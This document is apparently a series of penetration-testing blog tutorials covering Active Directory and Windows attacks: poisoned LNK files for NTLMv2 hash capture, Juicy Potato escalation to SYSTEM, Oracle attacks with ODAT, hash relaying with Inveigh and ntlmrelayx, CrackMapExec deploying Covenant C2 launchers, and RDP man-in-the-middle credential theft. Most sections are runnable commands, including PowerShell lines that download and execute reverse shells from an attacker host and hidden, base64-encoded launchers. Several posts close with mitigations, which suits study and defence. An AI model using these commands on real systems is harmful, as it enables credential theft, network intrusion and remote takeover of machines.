Hacking Tutorial

Attacking Active Directory and Open File Shares: Capturing Password Hashes via Malicious LNK Files

If you’ve seen any of my other guides on attacking Active Directory, you’ll have noticed that I love using Responder or Inveigh to capture NTLMv2 hashes. In this tutorial, we’re still going to leverage these tools, but we’re going to force users to send us their hash in a bit different of a way.

Table of Contents:

  • Overview of the Attack
  • Topology of the Network
  • Performing the Attack
  • How Do We Mitigate This?

Overview of the Attack

What is it?

Using PowerShell, we’re able to create our own .lnk file that contains a poisoned icon path. By directing users to a remote SMB share as the file location of the thumbnail, we’re able to force users who access this file share to reach out and make an authentication request to a location that we control.

When can attackers use this?

This attack vector is especially useful in cases where you’ve obtained write access to a publicly accessible file share. If you can drop a specially crafted .lnk file in a location with high traffic, you should be able to capture a large number of NTLMv2 hashes for multiple users.

This can be further chained with SMB Relay attacks in the event that there are machines in the environment with SMB Signing disabled.


Topology of the Network

In our scenario, we have four machines that are all a part of the same internal network.

Windows Server 2019:

  • Acts as the domain controller.
  • Has a FQDN of king.nba.local.
  • IP address is 10.0.1.10
  • Hosts up a file share at \\King\Share

First Windows 10 Machine:

  • Joined to the nba.local domain.
  • Is used by NBA\kBryant domain user.
  • IP address is 10.0.1.11
  • O:\ drive is mapped to \\King\Share

Second Windows 10 Machine:

  • Joined to the nba.local domain.
  • Is used by NBA\kIrving domain user.
  • IP address is 10.0.1.200
  • O:\ drive is mapped to \\King\Share

Attacker Kali Linux:

  • Not domain joined.
  • IP address is 10.0.1.5

Performing the Attack

To begin, we need to first create our malicious .lnk file. Since we’ll be using PowerShell, you’ll need access to a Windows machine to generate the file, but it does not need to be domain-joined to the target network.

In a PowerShell prompt, we will create our malicious .lnk file using the following commands:

$objShell = New-Object -ComObject WScript.Shell
$lnk = $objShell.CreateShortcut("C:\Malicious.lnk")
$lnk.TargetPath = "\\<attackerIP>\@threat.png"
$lnk.WindowStyle = 1
$lnk.IconLocation = "%windir%\system32\shell32.dll, 3"
$lnk.Description = "Browsing to the dir this file lives in will perform an authentication request."
$lnk.HotKey = "Ctrl+Alt+O"
$lnk.Save()

Once the commands are ran, it should generate a file to C:\Malicous.lnk. When a user browses to this file, the thumbnail will attempt to load an icon from \\<attackerIP>\@threat.png. This image obviously doesn’t exist, but we can leverage this connection attempt create a challenge that accepts a NTLMv2 hash.

We’ll now rename this file to include an @ symbol in the beginning and give it a less suspicious name. This will force the file to show up at the top of the file-share, which should increase the chances that users browse across it.

Finally, we’ll copy it down to the target network and drop it into a public file share.

With our file planted, let’s head over to our Kali instance, change into our Responder directory, and start up our listener. If you don’t know what this is, check out my guide on LLMNR poisoning at Abusing LLMNR/NBT-NS in Active Directory Domains: Part 1 (Capturing NTLMv2 Hashes).

cd /opt/Responder
sudo python Responder.py -I eth0

Now, let’s simulate a user browsing to this file share. From one of the domain-joined machines, we’ll navigate to the O:\ drive like a real user would do. Right away, we’re able to capture that user’s NTLMv2 hash.

This will continue until the file is removed from the server, which could allow an attacker the ability to capture a large number of NTLMv2 hashes before getting busted.


How Do We Mitigate This?

  • Egress firewall rules. If SMB connections (ports 445 and 139) are not allowed outbound, the attacker would never be able to challenge the request and capture the NTLMv2 hashes of the users.
  • Strict file share permissions. File shares should never allow for anybody to write to them. Users that need write access should be very limited in terms of which directories they can write in, and the principal of least privilege should always be followed.
  • Enforce SMB Signing. While this won’t prevent the attack from occurring, it will limit the impact. If SMB Signing is not required across the network, attackers can easily relay these hashes to authenticate to machines across the domain.
  • Strong Password Policy. Surely you know by now that this is a must-have. A strong password could make these captured hashes useless if SMB Signing is enforced and the hashes are uncrackable.

Hacking Tutorial

Cracking SSH Keys Using John

Once you’ve come across an SSH key, they are sometimes encrypted and require a password to be passed along with it before you’re able to successfully use it for authentication. When this occurs, we can leverage John to extract the hash used to encrypt this key and attempt to crack it offline.


First, we’ll start by extracting the hash using SSHng2John.
python sshng2john.py ssh.key

Then we can rerun the above command, but redirect to a file.
python sshng2john.py /root/ssh.key > hash.ssh

And finally, we can pass it to John for cracking against a dictionary file.
john --wordlist=/opt/wordlists/rockyou.txt hash.ssh

Hacking Tutorial

How To Mount & Extract Password Hashes From VHD Files

On an engagement, you may come across VHD files that are not stored properly. This could be open on an exposed NFS or SMB share, or it could even be from a backup file that you exfiltrated. No matter how you come in contact with these files, there are many ways to go through them to extract critical information.


Using 7-Zip, you can view the contents of a VHD file.

7z l file.vhd

To extract the contents, you can also use 7-zip.

7z x file.vhd


Mounting a VHD on Linux

To mount a VHD on Linux, you can use Guest Mount.

sudo apt install libguestfs-tools -y

Now we’ll start by creating a directory that we’ll mount the VHD file to.

sudo mkdir /mnt/vhd

And then we’ll use guestmount to mount the directory in read-only (ro) mode.

guestmount --add file.vhd --inspector --ro -v /mnt/vhd

This could take a few minutes to mount depending on the size. But eventually it will finish and you should be able to view the contents.

cd /mnt/vhd
ls -la

To list the files of select directories, you can use find.

find Desktop Documents Downloads -ls


Extracting Local SAM Database from VHD Files

First, follow the above steps to mount the VHD file. Once mounted, you may be able to grab the files that make up the SAM database so you can crack it offline.

cd /Windows/System32/config
cp SAM SYSTEM /<localDir>

Note: You may also want to grab nts.dit if you’re on a domain controller so you can crack all of the AD hashes.

Now you can go to the local directory that you copied those files into and use secretsdump to extract the hashes.

impacket-secretsdump -sam SAM -system SYSTEM local

Instead of taking the hash offline to try and crack it, you can see if you have write access using this hash to any SMB share by using SMBmap.

smbmap -u <userName> -p <lmHash:ntHash> -H <targetIP>

Hacking Tutorial

Windows Privilege Escalation: Abusing SeImpersonatePrivilege with Juicy Potato

When you’ve found yourself as a low-level user on a Windows machine, it’s always worthwhile to check what privileges your user account has. If you have the SeImpersonatePrivilege, there is a very simply attack vector that you can leverage to gain SYSTEM level access.

Table of Contents

  • Verifying Permissions and Downloading Exploit
  • Performing the Attack

Verifying Permissions and Downloading Exploit

Let’s start by checking what privileges our user has.

whoami /all

Based on the return output, we can confirm that we have the correct privileges to abuse this vulnerability.

Great! Lets go out and download our exploit. You can get the latest version by navigating to the following Github page, and clicking on Releases.

https://github.com/ohpe/juicy-potato

Once downloaded to our system. lets transfer it to our victim machine using your favorite method. Feel free to review the options at my Windows File Transfer Cheatsheet. Once its present on the target system, running the executable should return the following help documentation.

Perfect! We should be ready to perform the attack.


Performing the Attack

This attack will allow us to run executables as the SYSTEM level process. This means that in addition to the JuicyPotato.exe exploit, we’ll also need our own malicious file that we wish to execute. This could be many different things, but a common example would be a reverse shell payload. You can learn how to generate these by visiting my MSFVenom Reverse Shell Payload Cheatsheet (with & without Meterpreter).

However in this example, I’m going to use a PowerShell Nishang reverse shell. If you do not have this downloaded, you can get it from the following Github page: https://github.com/samratashok/nishang

With the contents of this repo stored in your /opt directory, let’s copy the Invoke-PowerShellTcp.ps1 script to our present working directory as rev.ps1.

sudo cp /opt/nishang/Shells/Invoke-PowerShellTcp.ps1 rev.ps1

Then, let’s make a slight modification to the script and add the following line to the bottom. Doing this will not only load the modules into the PowerShell session when called upon, but it will also execute them so that a reverse shell connection can establish.

Invoke-PowerShellTcp -Reverse -IPAddress <attackerIP> -Port <attackerPort>

With that script modified and ready, we can host it up on our webserver using the following command:

sudo python -m SimpleHTTPServer 80

Oh! And don’t forget to start your Netcat listener.

sudo nc -nvlp <attackerPort>

The only thing needed at this point is a batch script that we can pass to Juicy Potato. Since Juicy Potato will run the batch script as SYSTEM, any commands we place in it will execute as SYSTEM. Let’s have our batch script contain the following PowerShell command so that it will download our Nishang reverse shell and execute it.

powershell "IEX(New-Object Net.WebClient).downloadString('http://attackerIP/rev.ps1')"

Now we’ll transfer this batch file to our target and run our Juicy Potato command! To understand what we’re doing in this attack, I’d recommend reading http://ohpe.it/juicy-potato/. The following command should work in most cases without the need for modification (other than the path/executables).

.\JuicyPotato.exe -t * -p c:\path\to\executable.bat -l 9002

If the above command returns an error, you may need to find a different CLSID. If that’s the case, you can find a different one from the following page: https://ohpe.it/juicy-potato/CLSID/

.\JuicyPotato.exe -t * -p c:\path\to\executable.bat -l 9002 -c '{CLSID}'

If everything works, Juicy Potato should execute executable.bat as SYSTEM, which issues a PowerShell command that downloads rev.ps1 from our attack machine. Rev.ps1 will then load Nishang into memory, and establish a reverse shell connection to our Netcat listener. Running whoami in that connection should return SYSTEM.


Additional Resources:

A more modern version of this attack is Rogue Potato: https://github.com/antonioCoco/RoguePotato

Hacking Tutorial, Pentesting

Pentesting Oracle Databases with The Oracle Database Exploitation Tool (ODAT)

When coming across an Oracle database, there is an awesome framework that you can use for pentesting it called The Oracle Database Exploitation Tool (ODAT). This post intends to serve as a guide for leveraging this tool, based on what Ippsec performs during his Silo video.

Table of Contents:

  • Installing ODAT
  • Bruteforcing SIDs
  • Brute Forcing User Accounts
  • Gaining a Reverse Shell

Installing ODAT

The Oracle Database Exploitation Tool (ODAT) is available for download at https://github.com/quentinhardy/odat.

We’ll start by changing into opt and running git.

cd /opt
git clone https://github.com/quentinhardy/odat.git

Then we’ll change into the directory and install additional packages.

cd odat/
sudo apt-get install libaio1 python3-dev alien python3-pip

Get instant client basic, sdk (devel) and sqlplus from the Oracle web site:

X64: http://www.oracle.com/technetwork/topics/linuxx86-64soft-092277.html
X86: http://www.oracle.com/technetwork/topics/linuxsoft-082809.html

Move the downloaded file into this directory and run the following command.

sudo alien --to-deb *.rpm

This should unpack a few files, and then run.

sudo dpkg -i *.deb

Put these lines in your /etc/profile file in order to define Oracle env variables:

export ORACLE_HOME=/usr/lib/oracle/<version>/client64/
export LD_LIBRARY_PATH=$LD_LIBRARY_PATH:$ORACLE_HOME/lib
export PATH=${ORACLE_HOME}bin:$PATH

Then restart your session!


Bruteforcing SIDs

The SID is something that you have to provide with the rest of our commands in order to leverage this tool. I’m not sure exactly what a SID is, but I like to pretend that it’s a container that contains multiple databases. Because of this, we need to first identify what SIDs are in use before we can enumerate user accounts.

To begin our attack, we can use the following:

./odat.py sidguess -s <targetIP> -p <port>

Note: You can also use the Metasploit module /oracle/sid_brute

Eventually, the valid SIDs should be returned.


Brute Forcing User Accounts

Next, we can leverage the passwordguesser module to guess credentials. By default, ODAT will use a password file that is in all caps, but you may or may not want to alter and/or change the file used. For example, some versions of Oracle may be case sensitive and you won’t want a password file in all caps.

If you want to customize the wordlist, you can modify the file located at the following path:

/opt/odat/accounts/accounts.txt

You could even copy the wordlist that Metasploit uses, which is located at the following path. Just make sure to reformat your wordlist in the correct format:

/usr/share/metasploit-framework/data/wordlists/oracle_default_userpass.txt

Once you’re ready to run the attack, you can with the following command.

./odat.py passwordguesser -s <targetIP> -d <SID>


Gaining a Reverse Shell

A quick snippet of the help documentation can be found below.

To gain a shell, you can upload a reverse shell to the box, as long as you have identified a valid SID and valid user credentials with write privileges:

./odat.py utilfile -s <targetIP> --sysdba -d <SID> -U <username> -P <password> --putFile <remotePath> <remoteFilename> <localFilename>

Ippsec shows doing this within his Silo video like this.

Then you can execute the file using the following command. Make sure you set up a listener to catch your shell.

./odat.py externaltable -s <targetIP> --sysdba -d <SID> -U <username> -P <password> --exec <remotePath> <remoteFilename>


Hacking Tutorial

Enumerating Valid Active Directory Usernames with KerBrute

When you come in contact with a Windows domain, you may want to try and leverage Password Spraying attacks (really, you should –they’re super effective). But how do you get a valid list of usernames to load into your password sprayer?


Downloading the Tool

You could leverage a tool called KerBrute to pull this off. A quick Google search on this tool returns the following Github page.

https://github.com/ropnop/kerbrute

You can also download precompiled binaries from the following.

https://github.com/ropnop/kerbrute/releases/tag/v1.0.3


Setting Up our Attack

With the tool in hand, we can view the help documentation.

Now we just need to prepare a list of users to enumerate. If you’ve already started to find usernames around the network, you can make your own customer user list. Otherwise, you can leverage something from the seclists usernames list, which can be downloaded at the following page.

https://github.com/danielmiessler/SecLists

The syntax for the command is very straightforward.

sudo ./kerbrute userenum -d <domain> <userList>

And just like that, we can see that all of the usernames we provided in our file are valid!

Note: It may be worthwhile to add a “known invalid” username to your userlist, just to make sure the server isn’t configured to respond stating all users are valid, whether or not that is true.

Hacking Tutorial

Capturing & Relaying Net-NTLM Hashes Without Kali Linux Using Inveigh

I’ve recently uploaded part three of my LLMNR series. If you’ve missed it, I’ve used Responder and NTLMRelayX with Kali Linux to:

But what happens if you’re on a red team engagement or are otherwise unable to utilize Kali Linux? Trying to get Responder and Impacket running in Windows is a pain, but luckily there is another tool that we can leverage!

Table of Contents

  • Importing Inveigh Module
  • Basics of Running Inveigh
  • Capturing Hashes in Inveigh
  • Relaying Hashes Captured w/ HTTP Proxy
  • Performing SMB to SMBRelay w/ Inveigh
  • Conclusion

Importing Inveigh Module

A quick Google search for “Github Inveigh” returns the following page.

https://github.com/Kevin-Robertson/Inveigh

Before going too far, I’d also highly recommend bookmarking the Inveigh Wiki page. This is where you’ll find details on all of the available parameters.

https://github.com/Kevin-Robertson/Inveigh/wiki

Feel free to download this tool using whatever method works for you, but I personally like to install the Git Bash for Windows utility and install it as if I’m in Linux. If you need a hand getting this installed, check out my guide Installing Git Bash for Windows.

In true wannabe Linux fashion, I like to create a \opt directory in the root of my C:\ drive. This is where I’ll launch my Git Bash session and run the following command to download Inveigh.

git clone https://github.com/Kevin-Robertson/Inveigh.git

Now let’s spin up a PowerShell instance, change into the newly created \Inveigh directory, set our Execution Policy to Remote Signed, and import the script.

Note: You may need to run this as Administrator to take full advantage of all features.

cd C:\opt\Inveigh
Set-ExecutionPolicy -ExecutionPolicy RemoteSigned
Import-Module ./Inveigh.psd1

Alternatively, you could bypass the need to download the scripts and just load the script directly into memory by using the following:

IEX (New-Object Net.WebClient).DownloadString("http://yourhost/Inveigh.ps1")

OR

IEX (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/Kevin-Robertson/Inveigh/master/Inveigh.psd1")


Basics of Running Inveigh

At this point, Inveigh should be imported into the PowerShell session, waiting for us to call on it. We can start listening to requests on the network by using the following command. While not all of these parameters may be required, I like to use them.

  • -ConsoleOutput : Enable/Disable real time console output. If using this option through a shell, test to ensure that it doesn’t hang the shell. Medium and Low can be used to reduce output.
  • -NBNS : Enable/Disable NBNS spoofer.
  • -HTTPS : Enable/Disable HTTPS challenge/response capture. Warning, a cert will be installed in the local store. If the script does not exit gracefully, manually remove the certificate. This feature requires local administrator access.
  • -Proxy : Enable/Disable proxy server authentication captures.
  • -IP : Local IP address for listening and packet sniffing. This IP address will also be used for LLMNR/mDNS/NBNS spoofing if the SpooferIP parameter is not set.

Invoke-Inveigh -ConsoleOutput Y -NBNS Y -mDNS Y -HTTPS Y -Proxy Y -IP <attackerIP>

At this point, the listener will be active and output should be displayed on screen. By default, DNS requests being broadcasted on the network will also be displayed in this window, giving you some insight as to what devices and users on the network are doing.

If you press any key in this window, it will stop the live view of requests, but keep the listener running. You can then utilize the following commands, as desired.

Clear-Inveigh – clear the $inveigh hashtable
Get-Inveigh – get data from the $inveigh hashtable
Stop-Inveigh – stop all running Inveigh modules
Watch-Inveigh – enable real time console output

Note: When using Get-Inveigh, I like to add the -NTLMv2 parameter to return all NTLMv2 hashes that were captured.


Capturing Hashes in Inveigh

As long as you have your listener running from before, capturing the hashes should be trivial. We just need to wait for LLMNR to kick in, or for a user to browse your SMB/HTTP shares. Let’s give things a little push in my virtual environment, by attempting to browse to a share that doesn’t exist.

Once we do that, we can head over to our Inveigh window. If you have live output being displayed, you should see the NTLMv2 hash presented to you. If you do not have live output running, you can issue the following command into your PowerShell window.

Get-Inveigh -NTLMv2


Relaying Hashes Captured w/ HTTP Proxy

In addition to capturing hashes, we can also relay hashes as long as their captured in our HTTP proxy. However, this may be a bit of a challenge, because majority of hashes are captured via SMB. Inveigh does not currently support relaying hashes captured via SMB.

To being, we’ll import the Inveigh-Relay.ps1 module.

. ./Inveigh-Relay.ps1

And then the syntax is very straightforward. We just need to specify the target to relay our Net-NTLM hash to, along with what command to run once we have a valid administrator account captured. In addition to this, Invoke-InveighRelay also has some additional “Attack Modes”.

  • Enumerate – The enumerate attack can perform Group, User, Share, and NetSession enumeration against a target.
  • Execute – Performs PSExec style command execution. In previous versions of Inveigh Relay, this was the only available attack. Note, they removed SMB1 support.
  • Session – Inveigh Relay can now establish and maintain privileged/unprivileged authenticated SMB sessions. The sessions can be accessed with Invoke-SMBClientInvoke-SMBEnum, and Invoke-SMBExec from their Invoke-TheHash project. Inveigh Relay will attempt to keep the sessions open as long as the module is running.

My example command will look like this.

Invoke-InveighRelay -ConsoleOutput Y -Target <targetIP> -Command "whoami" -Attack Enumerate,Execute,Session

Now here’s the issue. I mentioned that we couldn’t relay a SMB connection like we can with Responder. This means browsing to a fake share no longer does anything for us. However, we can browse to our hosted HTTP proxy as a quick proof of concept.

Now there is a lot going on in this image, but let’s break this down.

  1. On the left side, we can see the victim browsed to the HTTP server hosted by Inveigh. Inveigh then relayed that hash to the specified target.
  2. Because the user had local admin rights on the target, we could see that we were successfully able to enumerate the local admin users and custom file shares.
  3. We were also able to execute the command we specified when setting up our Invoke-InveighRelay command.

Performing SMB to SMBRelay w/ Inveigh

Previously, I said we are unable to relay a captured hash from SMB to a target via SMB, which is why I had to do my proof of concept using the HTTP Proxy. However, the creator of Inveigh, Kevin Robertson, has had luck with blocking port 445 to encourage clients to use WebDav Port 80 as a failover.

This did not work for me in my test lab, but I wanted to mention it here in case it works for you.


Conclusion

Overall, I think Inveigh is a handy tool if you’re in a pinch, or dealing with a Windows-only scenario and want to try your luck at capturing Net-NTLM hashes. However, I think I still prefer Responder as it seems to be more feature rich for relaying hashes than what we’re currently able to do with Inveigh.

What are your thoughts?

Hacking Tutorial

Abusing LLMNR/NBT-NS in Active Directory Domains: Part 3 (Relaying Net-NTLM Hashes w/ Responder & NTLMRelayX)


Other Parts in Series:

In this guide, I will show you how to take these captured NTLMv2 hashes and relay them to vulnerable machines on the same network, completely bypassing the need to crack them!

Part 3 Table of Contents:

  • Wait, Am I Relaying or Passing?
  • Overview of the Attack
  • Let’s Talk Prereqs
  • Topology of the Network
  • Setting up the Attack
  • Performing the Attack
  • Mitigation

Wait, Am I Relaying or Passing?

Before we dive in too deep, I do want to take a moment to clarify the difference between relaying a captured hash, and passing a captured hash.

  • You CAN perform Pass-The-Hash attacks with NTLM hashes.
  • You CANNOT perform Pass-The-Hash attacks with Net-NTLM hashes.

So where do you get a NTLM hash? These are the type of hashes that are captured when you use a tool like SecretsDump.py to extract the contents of a SAM database. These type of hashes are stored on a system and cannot be relayed over the network. However, you can take a hash in this format and “pass” it to another machine using a tool like PTH-WinExe. While it’s not a full blown tutorial, you can read more about using this tool in a post I made titled Popping Remote Shells w/ winexe & pth-winexe on Windows.

Net-NTLM, cannot be passed around the network. This means in order to use this type of hash to authenticate to another machine, you must capture this hash while it is in transit, and then relay it to a destination that you control. Showing how to do this is the purpose of today’s guide.


Overview of the Attack

If you’ve gone through my previous guides, you already know that we can use a tool called Responder to be intercept any LLMNR broadcasts on the network. By responding to these requests, we are able to capture Net-NTLM hashes from the user account that initiates the request.

Relaying this hash uses the same method, except instead of presenting the hash to us as the hacker, we relay it to a different machine that we’d like to get control of. As long as the hash we captured belongs to a user with admin rights on our destined machine, we should be able to get command execution to take control of it.


Let’s Talk Prereqs

Alright so we know that we must relay a Net-NTLM hash, but what else is required for this attack to work?

  • You must be on the same network as the victim(s). This means that if your attacking machine is in a different subnet/broadcast domain, you will be unable to capture the Net-NTLM hash.
  • LLMNR must be enabled in the network (enabled by default).
  • SMB Signing must be disabled or not required on the target machine. This is the default configuration for most Windows desktop operating systems. Windows Servers will usually have SMB Signing enabled and enforced by default.
  • The Net-NTLM hash that you capture must belong to an elevated user on the target machine in order for you to get command execution.

Topology of the Network

In our scenario, we have four machines that are all a part of the same internal network.

Windows Server 2019:

  • Acts as the domain controller.
  • Has a FQDN of king.nba.local.
  • IP address is 10.0.1.10

First Windows 10 Machine:

  • Joined to the nba.local domain.
  • Is used by NBA\kBryant domain user.
  • IP address is 10.0.1.11

Second Windows 10 Machine:

  • Joined to the nba.local domain.
  • Is used by NBA\kIrving domain user.
  • IP address is 10.0.1.200

Attacker Kali Linux:

  • Not domain joined.
  • IP address is 10.0.1.5

Setting up the Attack

To begin, let’s head over to our Responder directory. I like to store mine in /opt.

cd /opt/Responder

Find the Responder.conf file and edit it using your favorite text editor. In order for us to run NTLMRelayX later, we’ll need to turn off the SMB and HTTP servers. If we don’t take this step, NTLMRelayX will be unable to utilize these protocols later.

With those servers disabled, we’re ready to fire up Responder. You’ll need a few flags for this to work correctly.

-I : Used to provide the interface that we’re going to listen on.

-r : Enable answers for netbios wredir suffix queries.

-d : Enable answers for netbios domain suffix queries.

sudo python Responder.py -I eth0 -r -d -w

With Responder running, we need to now configure NTLMRelayX so that we can forward any captured Net-NTLM hashes to a target of our choosing. We’ll start by changing into the impacket directory and then use a command similar to the one below.

cd /opt/impacket

sudo ntlmrelayx.py -t <target> -smb2support

Note: You’ll need to include the -smb2support flag unless the machine you’re targeting supports SMBv1.

With both commands running, we finally have our attack setup.

Instead of targetting just a single machine, you could also use the -tf targets.txt flag to provide a list of targets.


Performing the Attack

At this point we have everything set up. Now we just need to sit back and wait for LLMNR to do it’s thing. If we wanted to give it a little push, we could manually browse to a file share that doesn’t exist from a machine that differs from who we are targeting.

At this point, the hash of the user account we issued that request from would be captured and then relayed to our specified target(s). If this user happens to be a local administrator account, NTLMRelayX will dump the SAM database by default.

If we wanted to get more creative, we could also use the -c flag to specify a command to run. Combine this with your favorite C2 launcher (perhaps Covenant), and you’ve got some real nasty stuff going on here.

As a quick proof of concept, I’ll just issue a basic whoami command.

sudo ntlmrelayx.py -t <target> -smb2support -c "whoami"


Mitigation

There are a few ways to mitigate this attack vector.

  1. Disable the LLMNR protocol in your environment. If this wasn’t running to begin with, we wouldn’t be able to capture the Net-NTLM hash so easily. However, this isn’t fool proof as there are other ways to intercept these hashes in a network.
  2. Enable and Enforce SMB Signing. This attack requires SMB Signing to be Not Enforced in order to work successfully against the target machines. By default, SMB Signing is typically enabled on Windows Server operating systems, but disabled on Windows Desktops.
  3. Don’t give users local admin rights, especially not on multiple machines. If we are unable to capture elevated user hashes, we’re unable to get command execution on the target machines.

More to come on mitigation in the future, including step by step instructions on creating and configuring GPOs.

Hacking Tutorial

Using CrackMapExec to Install Covenant C2 Launchers

CrackMapExec is a wonderful tool to leverage once you have valid domain credentials. If you happen to have elevated domain credentials, the possibilities become endless on what you can do.

I was recently on an internal network engagement where I was able to pull down cleartext credentials to a domain admin account. CrackMapExec allowed me to easily execute commands and dump SAM tables, but what else can I do to take this to the next level?

This is where Covenant C2 comes in! I found lots of blog posts online that talk about how to install and set up Covenant, but I couldn’t find anything that clearly showed how to leverage a tool like CrackMapExec to actually get Grunts connected. This post aims to serve as a guide to fill that gap.

Table of Contents:

  • Installing Covenant C2
  • Setting up the Listener.
  • Setting up the Launcher
  • Shortening the Encoded Launcher
  • Hosting the Launcher on a Different Webserver
  • Encoding Custom Payloads
  • Using CrackMapExec to Launch Covenant Grunts

Installing Covenant C2

I don’t really want to go into detail on how to set up Covenant, but there are some awesome articles that go into more depth on this topic.

git clone --recurse-submodules https://github.com/cobbr/Covenant
cd Covenant/Covenant
dotnet build
dotnet run

Setting up the Listener

Also, this is going to go into depth on this, but this is the Listener that I set up in order for my example demonstration to work.

BindAddress: 0.0.0.0
BindPort: 8081
ConnectPort: 8081
ConnectAddresses: Your routeable address to this instance.


Setting up the Launcher

Now that we have a Listener, we need to generate a Launcher. Since CrackMapExec has the ability to execute commands, we’ll leverage PowerShell for this. Go ahead and fill out the settings that you need for for your engagement. Once it’s ready, click Generate.

This should generate two commands that you can then run against a system to spawn a Grunt instance, one that is encoded and one that isn’t. In order for us to use CrackMapExec, you’ll need the Encoded Launcher. I suggest testing this out by running it against a Windows machine you control to make sure things are set up correctly.


Shortening the Encoded Launcher

By default, the Encoded Launcher that gets generated is likely too long to use with CrackMapExec. Instead, we’ll need to create our own Encoded Launcher that will leverage the Invoke-Expression cmdlet to download and execute a web-hosted payload. If you’re going to host this launcher with Covenant directly, you can click on the Host tab and specify the path for the file.

The non-encoded command we’re looking to create will look similar to whats noted below. Again, you’ll need to make sure Covenant is hosting the file up in order for you to be able to use it.

powershell -Sta -Nop -Window Hidden -Command "iex (New-Object Net.WebClient).DownloadString('http://<localhost:8081/launcher.ps1')"

The encoded version of this payload will be much shorter and should be able to be passed to CrackMapExec.


Hosting the launcher on a different machine

If you’re going to host the file from a different machine, you’ll need to Encode your own command instead of using the provided command. This can be achieved by doing the following.

First, you’ll need to navigate to the Launcher’s Generate tab and Download it to the system you wish to host it on.

Once this PowerShell script is present on the target system, feel free to host it up with your favorite web hosting tool. In my example, I’ll leverage Python to do this.

sudo python -m SimpleHTTPServer 8082

Now we need to craft our powershell command that will go out to this webserver, download, and execute the payload into memory. The command should look something like this before encoding. The only difference between this and the one that Covenant produces is the web address.

powershell -Sta -Nop -Window Hidden -Command "iex (New-Object Net.WebClient).DownloadString('http://webServer:8082/launcher.ps1')"

Encoding Custom Payloads

To generate the encoded command we need to run, we can use the following commands in PowerShell. You’ll want to replace $string with the contents of your -command flag mentioned above.

$string = "iex (New-Object Net.WebClient).DownloadString('http://<webServer>:8082/ps.ps1')"
$encodedcommand = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($string))
echo $encodedcommand 

For Linux Users: Or, you could also place your PowerShell command into a .ps1 script and run the following to get the encoded command out of Kali.

cat file.ps1 | iconv -t utf-16le | base64 -w 0

Then you can take the output from your echo/cat command, paste it into the placeholder below, and test to make sure your launcher works properly.

powershell -Sta -Nop -Window Hidden -EncodedCommand <encodedCommand>

Using CrackMapExec to Launch Covenant Grunts

Now that we have our command ready, we can simply pass that to CrackMapExec like this.

sudo crackmapexec smb <target(s)> -u <user> -p <password> -x '<encodedCommand>'


Donations and Support:
Like my content? Please consider supporting me on Patreon:
https://www.patreon.com/infinitelogins

Purchase a VPN Using my Affiliate Link
https://www.privateinternetaccess.com/pages/buy-vpn/infinitelogins


Hacking Tutorial

Performing RDP Man in the Middle (MitM) Attacks Using Seth.sh to Steal Passwords

Are you used to getting inundated with invalid certificate prompts when connecting to a remote machine? Way more often than not do I see self-signed certificates in play when establishing RDP connections. This always left me wondering… Surely this opens the door to a Man in the Middle Attack?

Insert Seth! Which is described by its authors as “A tool written in Python and Bash to MitM RDP connections by attempting to downgrade the connection in order to extract clear text credentials.”

Table of Contents:

  • Installing the Tool
  • Setting the Stage
  • Performing the Attack
  • Mitigation Strategies

Installing the Tool

You can download the tool from GitHub by using the following command.

sudo git clone https://github.com/SySS-Research/Seth.git

We have a couple prerequisites to install.

sudo apt install dsniff -y


Setting the Stage

In my demo, we have three virtual machines in play.

  1. Attacker VM running Kali Linux at IP address 10.0.0.139
  2. Victim VM running Windows 10 at 10.0.0.20
  3. Server/Destination VM running Windows 10 at 10.0.0.250.

The victim is going to sign into his computer, and then attempt to perform a RDP connection to the Destination VM at 10.0.0.250 using his domain credentials, NBA\dLillard. When he attempts the connection, he is prompted to enter a password.

Because IT admins are usually lazy, all machines are just using their self-signed certificates which generate certificate errors when users connect. Many users in the real world are actually numb to these errors because this is such a common misconfiguration left far too often. Because of this, majority of users will just ignore the certificate error that gets generated during the Man in The Middle attack.


Performing the Attack

The tool is actually very simple to use.

sudo ./seth.sh <INTERFACE> <ATTACKER IP> <VICTIM IP> <GATEWAY IP|HOST IP>

Using the above syntax, our command will look like this.

sudo ./seth.sh eth0 10.0.0.139 10.0.0.20 10.0.0.250

When we execute the above command, we just need to wait for the victim to attempt their RDP connection. Once they do, they’ll be treated with their normal credential and certificate error prompts, which should return their cleartext credentials to us.

The above example is showing output from Seth when the destination machine does not require NLA authentication. However, domain joined Windows 10 machines will enforce NLA by default, which means we will not be able to forward the connection request off to the server in order to establish the connection.

However, even with NLA enabled, Seth will spin up a fake server in order to attack the client and receive the cleartext credential. The end user’s connection attempt to the server will fail, but we’re still able to utilize the tool to grab what we need.

Warning When Using Against Local User Accounts

Be careful when using this tool against machine that are not domain joined, or against machines that authenticate over RDP using local user accounts.

I found that when I attempted to perform the attack to non-domain joined machines, the invalid hostname was passed to the destination server. The login was attempted using the local user account to the hostname of the victim, and not the local user account on the hostname of the destination. The attack still “worked” because I was able to extract cleartext credentials, but the end user was unable to authenticate to their destined computer and would know something was wrong.


Mitigation Strategies

Configure clients so they do not establish connections to a RDP host if they cannot verify its identity. This will require Public Key Infrastructure, either by purchasing public certification or rolling out your own infrastructure.

Windows machines can be configured in this way using the following GPO:

Computer Configuration\Policies\Administrative Templates\Windows Components\Remote Desktop Services\Remote Desktop Connection Client\Configure server authentication for client

TAKE CERTIFICATE WARNINGS SERIOUSLY.. mm.kay?